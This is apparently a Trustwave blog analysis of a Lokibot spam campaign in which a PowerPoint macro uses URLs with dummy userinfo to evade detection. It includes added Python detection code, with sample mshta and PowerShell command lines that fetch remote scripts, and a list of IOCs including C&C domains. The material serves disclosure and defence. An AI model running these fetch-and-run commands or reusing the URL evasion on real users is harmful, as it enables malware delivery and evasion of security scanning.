In Spam, Evasive URLs: Part 2

A URL might be perfectly valid, yet still deceptive. In this blog we present another technique involving URLs that we observed in a recent malicious spam campaign. This is a continuation of an earlier blog that discussed how valid URL formats can be used to evade detection.

The spam in this campaign carries a PowerPoint Add-in attachment containing a malicious macro. When the PowerPoint file is closed, the macro accesses a URL via the Windows binary mshta.exe, which ultimately leads to several pieces of malware being installed on the system. This routine is not unusual for macro downloaders; however, we found the obfuscation applied to the URL interesting and worth further investigation.

Figure 1: The spam containing a PowerPoint Add-in, and the PowerPoint process tree

Figure 2: The PowerPoint attachment and its macro code, where the initial malicious URL is assembled

The domains associated with this campaign are already known to host malicious files and obfuscated malicious data. To trick the email recipient, and to avoid being flagged by email and AV scanners, the cybercriminals behind this campaign employed a semantic attack on these URLs.

A URI may have an Authority component, whose structure is shown below. If the Userinfo subcomponent is present, it is preceded by two slashes and followed by an "@" character.

authority = [userinfo@]host[:port]

Userinfo is rarely used, and as such it can be used to try to fool a casual observer. In this campaign, dummy userinfo is included in the URLs. The bad guys are trying to make the domains inconspicuous while still conforming to the generic URI syntax.

Figure 3: The URL flow

The initial URL shown in the image above has the domain j[.]mp, a URL shortening service provided by Bit.ly (itself a URL shortener). To avoid being characterized as a short URL, and thereby evade detection signatures, the string "%909123id" is used repeatedly in the userinfo. Since the URL j[.]mp/kassaasdskdd (shortened from Figure 3) does not require userinfo to access any resource, the userinfo data is simply ignored when the URL is accessed. This first URL, accessed by the PowerPoint attachment, redirects to an obfuscated VBScript hosted on Pastebin.
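The following is an added example, not code from the original post or from Trustwave: a small Python triage routine that applies the RFC 3986 rule described above (everything before the last "@" in the authority is userinfo and is ignored by the client) to recover the host a URL really points at, strips the userinfo to produce a canonical form, and flags the indicators this post describes: userinfo present, the same dummy token repeated inside it, and a known shortener or paste-site host. The sample URLs, their paths, and the host lists are constructed for the example; they are not the campaign's URLs.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Hosts named in the post's redirect chain. The shortener and paste site are
# legitimate services; their presence is a triage signal, not a verdict.
SHORTENER_HOSTS = {"j.mp", "bit.ly"}
PASTE_HOSTS = {"pastebin.com"}

# Constructed sample URLs in the shape the post describes: dummy userinfo in
# front of a legitimate host. Paths are placeholders, not the campaign's.
SAMPLE_URLS = [
    "http://%909123id%909123id@j.mp/EXAMPLE-short",
    "https://%909123id@pastebin.com/raw/EXAMPLE1",
    "https://example.org/page",
]


def split_authority(url):
    """Return (userinfo, hostport). Per RFC 3986 everything before the LAST
    '@' in the authority is userinfo; that is the part a browser or mshta.exe
    ignores when connecting. userinfo is None when there is no '@'."""
    netloc = urlsplit(url).netloc
    userinfo, has_at, hostport = netloc.rpartition("@")
    return (userinfo if has_at else None), hostport


def effective_host(url):
    """Lower-cased host the client actually connects to."""
    return (urlsplit(url).hostname or "").lower()


def strip_userinfo(url):
    """Canonical form with the userinfo subcomponent removed (port is kept)."""
    p = urlsplit(url)
    _, hostport = split_authority(url)
    return urlunsplit((p.scheme, hostport, p.path, p.query, p.fragment))


def analyse_url(url):
    """Triage one URL: real host, canonical URL, userinfo, and indicators."""
    userinfo, _ = split_authority(url)
    host = effective_host(url)
    findings = []
    if userinfo is not None:
        findings.append("userinfo present")
        # The post notes the same dummy string repeated in the userinfo.
        # ^(.+?)\1+$ matches any string that is one token repeated >= 2 times.
        if re.fullmatch(r"(.+?)\1+", userinfo):
            findings.append("repeated userinfo token")
    if host in SHORTENER_HOSTS:
        findings.append("url shortener host")
    if host in PASTE_HOSTS:
        findings.append("paste site host")
    return {
        "input": url,
        "host": host,
        "canonical": strip_userinfo(url),
        "userinfo": userinfo,
        "findings": findings,
    }


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = analyse_url(u)
        print(f"{r['host']:14} {r['canonical']:42} {', '.join(r['findings']) or '-'}")
```

The canonical form is the value worth matching against reputation lists or a short-URL signature: a rule keyed on the raw string would miss "j.mp" behind the userinfo, which is exactly the evasion the post describes.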

Figure 4: The obfuscated script on Pastebin and its de-obfuscated data

Figure 5: The registry entry created by the VBScript in Figure 4

The VBScript, served by the second URL in Figure 3, is a dropper. It writes a PowerShell downloader into the registry and sets up its persistence. The PowerShell downloads and processes the raw data at two more Pastebin URLs, then executes the resulting binaries.

The third and fourth URLs are Pastebin URLs too. Both contain dummy userinfo as well, which Pastebin ignores. The content at the third URL, pastebin[.]com/raw/uhMtv3Bk (shortened from Figure 3), is obfuscated PowerShell code. The PowerShell executes two .NET-compiled DLLs: the first DLL bypasses the Anti-Malware Scan Interface (AMSI) and then loads a DLL injector into memory. The fourth URL, pastebin[.]com/raw/Nz1mPUdT (shortened from Figure 3), contains an obfuscated Lokibot malware sample. This is injected into the legitimate process notepad.exe by the DLL injector mentioned earlier.
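As an added example (not code from the post or from Trustwave), the detection logic below evaluates process-creation events against the observable parts of the chain described in this and the earlier paragraphs: an Office application spawning mshta.exe or powershell.exe, a command line carrying a URL with userinfo in its authority, and a fetch of a Pastebin raw URL. The events are constructed in a simplified Sysmon-like shape (parent image, image, command line) rather than taken from real telemetry, and the sets of Office applications and script hosts are assumptions that generalize slightly beyond the PowerPoint-to-mshta case the post shows.

```python
import re

# Assumed parent/child names for the rule. The post shows PowerPoint spawning
# mshta.exe; Word and Excel are added as the other common macro carriers.
OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe"}

# A URL whose authority contains '@' (userinfo present). The non-greedy
# character class excludes '/', '?', '#' so the '@' must sit inside the
# authority, not in the path or query.
URL_WITH_USERINFO = re.compile(r"https?://[^\s/?#]*@[^\s/?#]+", re.IGNORECASE)
# A Pastebin raw fetch, with or without a userinfo prefix.
PASTE_RAW = re.compile(r"https?://(?:[^\s/?#]*@)?pastebin\.com/raw/", re.IGNORECASE)

# Constructed sample events modelled on the post's chain. Not real telemetry;
# URL paths are placeholders.
SAMPLE_EVENTS = [
    {
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta.exe http://%909123id%909123id@j.mp/EXAMPLE-short",
    },
    {
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell.exe -Command "iwr https://%909123id@pastebin.com/raw/EXAMPLE1"',
    },
    {
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "cmdline": "chrome.exe https://example.org/page",
    },
]


def basename(path):
    """File name of a Windows or POSIX path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names the event triggers (empty if none)."""
    parent = basename(event["parent"])
    image = basename(event["image"])
    cmd = event["cmdline"]
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office app spawned script host")
    if URL_WITH_USERINFO.search(cmd):
        hits.append("url with userinfo on command line")
    if PASTE_RAW.search(cmd):
        hits.append("pastebin raw fetch")
    return hits


def triage(events):
    """(index, hits) for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)}")
```

The first rule alone already covers the post's entry point; the userinfo rule is the one that keeps working when the attacker swaps j.mp or Pastebin for another legitimate host, since it keys on the URI trick rather than the domain.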

Summary

We found it interesting that the attackers were using URIs in this manner, which is essentially an attack on the user's preconceived notion of what a URI should look like. It may also defeat security solutions that expect URIs in a certain format.

Trustwave Secure Email Gateway has added protection for this threat for our customers. As advised by my colleague in the earlier blog, be cautious with URLs received in external emails, and check links before clicking.

IOCs

Email Attachment
REQUEST FOR OFFER 08-20-2020.ppt (82944 bytes) SHA1: 01A3399F8A075137CD4F68A2B247C509FCEAB21F

DLL Injectors
WindowsFormsApplication68.dll (49664 bytes) SHA1: F8E91A3A407235583058DF06C2C2CCDE73194A03
Guwav.dll (20480 bytes) SHA1: 70b45d01eea4156610583c8b3dfcab89eeb6f113

Obfuscated VBScript from pastebin[.]com/raw/XZxTT7Xy
(3346 bytes) SHA1: FC050B623983B10D60ED4557771609C9D10F3C3A
Obfuscated PowerShell from pastebin[.]com/raw/uhMtv3Bk
(525125 bytes) SHA1: 047D7516EF672AE882B322F1E3E9DF2BDF7F4583
Lokibot deobfuscated from pastebin[.]com/raw/Nz1mPUdT
(104.0KB) SHA1: A988B692581A76A6220A641037F7AA254C1F293F
Lokibot Setting URL
hxxp://195[.]69[.]140[.]147/[.]op/cr[.]php/SczbkxCQZQyVr
Lokibot C&Cs
kbfvzoboss[.]bid/alien/fre[.]php
alphastand[.]trade/alien/fre[.]php
alphastand[.]win/alien/fre[.]php
alphastand[.]top/alien/fre[.]php
